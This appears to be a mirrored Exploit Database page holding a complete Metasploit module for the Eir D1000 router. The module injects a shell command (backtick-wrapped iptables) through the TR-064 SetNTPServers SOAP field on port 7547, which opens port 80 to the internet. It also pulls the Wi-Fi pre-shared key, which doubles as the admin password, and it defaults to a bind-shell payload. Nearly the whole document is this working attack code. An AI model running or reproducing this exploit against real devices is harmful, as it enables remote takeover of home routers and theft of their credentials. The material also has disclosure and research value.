Eir D1000 Wireless Router – WAN Side Remote Command Injection (Metasploit)

• Exploit Database
• 16 阅读

• 作者： Kenzo
  日期： 2016-11-08
• 类别：

  • remote
  平台：

  • linux_mips
• 来源：https://www.exploit-db.com/exploits/40740/

• =begin
  # Exploit Title: Eir D1000 Wireless Router - WAN Side Remote Command Injection
  # Date: 7th November 2016
  # Exploit Author: Kenzo
  # Website: https://devicereversing.wordpress.com
  # Tested on Firmware version: 2.00(AADU.5)_20150909
  # Type: Webapps
  # Platform: Hardware
  
   
  Description
  ===========
  By sending certain TR-064 commands, we can instruct the modem to open port 80 on the firewall. This allows access the the web administration interface from the Internet facing side of the modem. The default login password for the D1000 is the default Wi-Fi password. This is easily obtained with another TR-064 command. 
  
   
  Proof of Concept
  ================
  =end
  
  ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
   
  class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
   
  include Msf::Exploit::Remote::HttpClient
   
  def initialize(info = {})
  super(update_info(info,
  'Name'=> 'Eir D1000 Modem CWMP Exploit POC',
  'Description' => %q{
  This exploit drops the firewall to allow access to the web administration interface on port 80 and
  it also retrieves the wifi password. The default login password to the web interface is the default wifi
  password. This exploit was tested on firmware versions up to 2.00(AADU.5)_20150909. 
  },
  'Author'=>
  [
  'Kenzo', # Vulnerability discovery and Metasploit module
  ],
  'License' => MSF_LICENSE,
  'DisclosureDate' => 'Nov 07 2016',
  'Privileged' => true,
  'DefaultOptions' => 
  { 
  'PAYLOAD' => 'linux/mipsbe/shell_bind_tcp'
  },
  'Targets' =>
  [
  [ 'MIPS Little Endian',
  {
  'Platform' => 'linux',
  'Arch' => ARCH_MIPSLE
  }
  ],
  [ 'MIPS Big Endian',
  {
  'Platform' => 'linux',
  'Arch' => ARCH_MIPSBE
  }
  ],
  ],
  'DefaultTarget'=> 1
  ))
   
  register_options(
  [
  Opt::RPORT(7547), # CWMP port
  ], self.class)
   
  @data_cmd_template = "<?xml version=\"1.0\"?>"
  @data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
  @data_cmd_template << " <SOAP-ENV:Body>"
  @data_cmd_template << "<u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
  @data_cmd_template << " <NewNTPServer1>%s</NewNTPServer1>"
  @data_cmd_template << " <NewNTPServer2></NewNTPServer2>"
  @data_cmd_template << " <NewNTPServer3></NewNTPServer3>"
  @data_cmd_template << " <NewNTPServer4></NewNTPServer4>"
  @data_cmd_template << " <NewNTPServer5></NewNTPServer5>"
  @data_cmd_template << "</u:SetNTPServers>"
  @data_cmd_template << " </SOAP-ENV:Body>"
  @data_cmd_template << "</SOAP-ENV:Envelope>"
  end
   
  def check
  begin
  res = send_request_cgi({
  'uri' => '/globe'
  })
  rescue ::Rex::ConnectionError
  vprint_error("A connection error has occured")
  return Exploit::CheckCode::Unknown
  end
   
  if res and res.code == 404 and res.body =~ /home_wan.htm/
  return Exploit::CheckCode::Appears
  end
   
  return Exploit::CheckCode::Safe
  end
   
  def exploit
  print_status("Trying to access the device...")
   
  unless check == Exploit::CheckCode::Appears
  fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
  end
   
  print_status("Exploiting...")
  print_status("Dropping firewall on port 80...")
  execute_command("`iptables -I INPUT -p tcp --dport 80 -j ACCEPT`","")
  key = get_wifi_key()
  print_status("WiFi key is #{key}")
  execute_command("tick.eircom.net","")
  end
   
  def execute_command(cmd, opts)
  uri = '/UD/act?1'
  soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers"
  data_cmd = @data_cmd_template % "#{cmd}"
  begin
  res = send_request_cgi({
  'uri'=> uri,
  'ctype' => "text/xml",
  'method' => 'POST',
  'headers' => {
  'SOAPAction' => soapaction,
  },
  'data' => data_cmd
  })
  return res
  rescue ::Rex::ConnectionError
  fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
  end
  end
   
  def get_wifi_key()
  print_status("Getting the wifi key...")
  uri = '/UD/act?1'
  soapaction = "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"
  data_cmd_template = "<?xml version=\"1.0\"?>"
  data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
  data_cmd_template << " <SOAP-ENV:Body>"
  data_cmd_template << "<u:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\">"
  data_cmd_template << "</u:GetSecurityKeys>"
  data_cmd_template << " </SOAP-ENV:Body>"
  data_cmd_template << "</SOAP-ENV:Envelope>"
  data_cmd= data_cmd_template
   
  begin
  res = send_request_cgi({
  'uri'=> uri,
  'ctype' => "text/xml",
  'method' => 'POST',
  'headers' => {
  'SOAPAction' => soapaction,
  },
  'data' => data_cmd
  })
   
  /NewPreSharedKey>(?<key>.*)<\/NewPreSharedKey/ =~ res.body
  return key
  rescue ::Rex::ConnectionError
  fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
  end
  end
  end